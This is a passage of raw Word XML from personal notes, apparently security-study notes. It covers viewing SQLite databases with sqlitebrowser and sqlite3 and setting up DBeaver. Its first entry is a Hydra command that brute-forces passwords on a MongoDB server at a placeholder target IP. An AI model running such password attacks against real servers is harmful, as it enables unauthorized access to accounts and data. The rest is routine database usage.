    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AF3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1227"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l &lt;username&gt; -P &lt;password-list&gt; mongodb://&lt;target-ip&gt;:27017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AF4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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F8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mmnkbcgjz8a5" w:id="222"/>
      <w:bookmarkEnd w:id="222"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to view .db files using sqlitebrowser (GUI)</w:t>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have a .db file, instead of viewing using sqlite3, you can download a GUI tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt update &amp;&amp; sudo apt install sqlitebrowser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AFD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001AFE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then use it to view the .db file!</w:t>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01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B02">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ge2lfj23vxri" w:id="223"/>
      <w:bookmarkEnd w:id="223"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlite3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B03">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want a GUI interface, look at the section above</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B04">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B05">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Access the database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlite3 database_name.db</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B07">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Showing tables:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="856"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B0A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B0B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Viewing Schema (the structure of a table):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.schema users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users is the table name.sg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting help:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="329"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B11">
      <w:pPr>
        <w:r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t xml:space="preserve">Query data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1327"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1327"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users is the name of the table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B15">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B16">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Update/modify data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="803"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE users SET age = 31 WHERE name = 'Alice';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deleting Data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B1A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="887"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE FROM users WHERE name = 'Bob';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B1B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exiting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>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1B1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.quit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B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21">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_foz7tx8s337o" w:id="224"/>
      <w:bookmarkEnd w:id="224"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dbeaver</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dbeaver is a GUI app for all things SQL related</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B24">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, all the text was in white and so was the background, so I couldn't see anything. To turn on dark mode (which fixes this problem), do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to Window (on the top)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Preference (on the bottom)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on User interface drop down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on appearance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then for "theme" pick dark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B2C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to show navigation bar on the left</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to Window</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on Database navigator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B2F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B30">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to view the data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3862388" cy="1701290"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="358" name="image352.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image352.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId545"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3862388" cy="1701290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Double click on any table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="890"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1981200"/>
